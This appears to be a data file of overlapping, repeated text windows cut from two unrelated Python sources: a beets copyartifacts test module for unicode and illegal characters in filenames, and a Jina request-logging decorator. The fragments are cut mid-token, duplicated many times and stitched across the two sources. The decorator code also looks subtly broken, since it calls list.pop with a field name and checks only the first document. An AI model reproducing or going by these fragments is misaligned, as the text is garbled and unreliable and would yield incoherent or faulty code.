"'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self):",
"Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag",
"config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')",
"= [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist",
"'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium =",
"u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),",
"def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import directory, illegal filename",
"- $album') # Create import directory, illegal filename character used in the album",
"Create import directory, illegal filename character used in the album name open(os.path.join(self.album_path, u'artifact.file'),",
"open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag",
"'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium =",
"\"\"\" Tests to check handling of artifacts with filenames containing unicode characters \"\"\"",
"os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium",
"in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag",
"filenames containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir,",
"self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),",
"self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'),",
"Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create",
"Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path,",
"check handling of artifacts with filenames containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename,",
"character used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),",
"os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path,",
"super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def",
"'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import",
"artifacts with filenames containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path",
"'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag",
"setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file'",
"open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium]",
"unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path)",
"illegal filename character used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium =",
"import sys from helper import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\"",
"from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of artifacts",
"medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album',",
"'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag",
"'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move']",
"= [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True",
"Tests to check handling of artifacts with filenames containing unicode characters \"\"\" def",
"of artifacts with filenames containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir()",
"Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import directory,",
"self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_',",
"album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media",
"from helper import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to",
"import directory, illegal filename character used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close()",
"self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path,",
"self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] =",
"'.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media =",
"self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')",
"characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False)",
"True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer()",
"[medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist -",
"CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of",
"test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media",
"test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import directory, illegal filename character",
"os import sys from helper import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase):",
"name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media =",
"class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of artifacts with filenames containing unicode",
"$album') # Create import directory, illegal filename character used in the album name",
"'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self):",
"self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self):",
"u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer()",
"config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media =",
"used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3',"
] |
[
">>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>>",
"typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums",
"verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level",
"= function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request",
"@add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger",
"**kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs,",
"parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields",
"parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time}",
"for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def",
"logs for `JINA_LOG_LEVEL` > info. You can set this as an env variable",
"is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not",
"def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level",
"docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else",
"time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time",
"non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self,",
"LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG:",
"... :param logger: The logger you want to use \"\"\" def decorator(function): @functools.wraps(function)",
"logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs)",
"Only shows logs for `JINA_LOG_LEVEL` > info. You can set this as an",
"os import time from typing import List from jina import DocumentArray from jina.logging.logger",
"can set this as an env variable before starting your `Jina` application. Example",
"functools import os import time from typing import List from jina import DocumentArray",
"a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set",
"logger: The logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self,",
"from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]:",
"Example usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>>",
"end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return",
"you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs):",
"jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields",
"from typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger from",
"The logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs,",
"dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}')",
"this as an env variable before starting your `Jina` application. Example usages: >>>",
"logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs)",
"{len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields =",
"doc in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field)",
"non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only shows",
"as an env variable before starting your `Jina` application. Example usages: >>> from",
"LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]:",
"import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests",
"= time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result",
"env variable before starting your `Jina` application. Example usages: >>> from jina import",
"result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for",
"JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields)",
"len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time()",
"parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self,",
"import time from typing import List from jina import DocumentArray from jina.logging.logger import",
"to a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can",
"def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you want",
"@functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level)",
"= LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level >",
"starting your `Jina` application. Example usages: >>> from jina import Executor, requests >>>",
"non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add",
"list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field not in",
"non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request function.",
"`JINA_LOG_LEVEL` > info. You can set this as an env variable before starting",
"_get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field",
"function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set this as",
"return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received",
"docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄",
"my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def",
"= JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self,",
"DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) ->",
"return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to",
"Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time",
">>> ... :param logger: The logger you want to use \"\"\" def decorator(function):",
"docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return",
"function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time",
"None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters,",
"List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity",
"to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.')",
"-> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields:",
"start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱",
">>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters,",
"containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields",
"> info. You can set this as an env variable before starting your",
"def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if",
"os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None",
"parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None",
"logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received",
"verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if",
"wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level",
"fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time =",
"else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs,",
"LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing",
"Elapsed time for request {end_time - start_time} seconds.') return result return wrapper return",
"application. Example usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger')",
"docs, parameters, **kwargs): >>> ... :param logger: The logger you want to use",
"non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field",
"in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\"",
"verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is",
"List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if",
":param logger: The logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def",
"verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self,",
"\"\"\" Add logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL`",
"Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)}",
"not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs)",
"> 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result",
"docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary:",
"None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs:",
"function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor')",
"an env variable before starting your `Jina` application. Example usages: >>> from jina",
"**kwargs): >>> ... :param logger: The logger you want to use \"\"\" def",
"field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality",
"your `Jina` application. Example usages: >>> from jina import Executor, requests >>> my_logger",
"for doc in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields:",
"for `JINA_LOG_LEVEL` > info. You can set this as an env variable before",
"monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕",
"function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters",
"from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor):",
"if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time =",
"if verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return",
"usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>>",
"if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs)",
"class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>>",
"logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` > info.",
"to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level =",
"{parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time",
"jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc",
"`Jina` application. Example usages: >>> from jina import Executor, requests >>> my_logger =",
"0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result =",
"> LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None.",
"import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray)",
"import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in",
"verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level",
"info. You can set this as an env variable before starting your `Jina`",
"variable before starting your `Jina` application. Example usages: >>> from jina import Executor,",
"time from typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger",
"request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0:",
"import os import time from typing import List from jina import DocumentArray from",
"logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷",
">>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param",
"import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields =",
"not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to",
"want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level",
"set this as an env variable before starting your `Jina` application. Example usages:",
"def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for",
"Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) >",
"if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging",
"logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result return wrapper",
"requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger)",
"or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs",
"use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL',",
"in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a",
"DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in",
"None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or",
"parameters, **kwargs): >>> ... :param logger: The logger you want to use \"\"\"",
"in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return",
"import functools import os import time from typing import List from jina import",
"**kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if",
"functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You",
"You can set this as an env variable before starting your `Jina` application.",
"= list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field not",
"= time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed",
"None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing",
"add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only shows logs for",
"import List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import",
"from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def",
"Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty",
"@requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger:",
"doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request",
"request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set this",
"decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level =",
"docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time -",
"time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result return",
">>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you",
"from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for",
">>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs):",
"JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs,",
"jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs:",
"Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>>",
"index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you want to",
"logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters,",
"**kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.')",
"jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>>",
"{non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time()",
"MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ...",
">>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The",
"= _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs,",
"= os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is",
"is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request",
"_get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters,",
"if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters,",
"time for request {end_time - start_time} seconds.') return result return wrapper return decorator",
"Add logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` >",
"def add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only shows logs",
"field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger):",
